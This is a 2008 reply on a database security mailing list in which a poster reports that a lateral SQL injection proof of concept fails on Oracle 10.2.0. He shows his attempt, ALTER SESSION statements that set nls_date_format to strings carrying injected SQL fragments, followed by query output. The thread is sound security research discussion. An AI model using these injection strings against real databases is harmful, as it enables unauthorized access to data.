[dbsec] Re: Lateral SQL Injection Revisited - No Special Privs Required
- From: "Richard Slide" <richard.slide@xxxxxxxxx>
- To: dbsec@xxxxxxxxxxxxx
- Date: Sat, 19 Jul 2008 17:07:29 +0200
Hello,
I have try your POC in oracle 10.2.0 and its seems dosen't work.
Do you have test it only in oracle 11 ?
this what i do .
I create on my db the user : usertest1 with password usertest1
then after
alter session set nls_date_format='"'' and myfunc()=1--"'; or
alter session set nls_date_format='"'' and 1=1--"';
select sysdate from dual;
SYSDATE
------------------
2008-07-19
Does this flow work only in oracle 11 ?
Cheers
Richard
- Follow-Ups:
- [dbsec] Re: Lateral SQL Injection Revisited - No Special Privs Required
- From: David Litchfield
Other related posts:
- » [dbsec] Lateral SQL Injection Revisited - No Special Privs Required
- » [dbsec] Re: Lateral SQL Injection Revisited - No Special Privs Required
- » [dbsec] Re: Lateral SQL Injection Revisited - No Special Privs Required
- » [dbsec] Re: Lateral SQL Injection Revisited - No Special Privs Required
- [dbsec] Re: Lateral SQL Injection Revisited - No Special Privs Required
- From: David Litchfield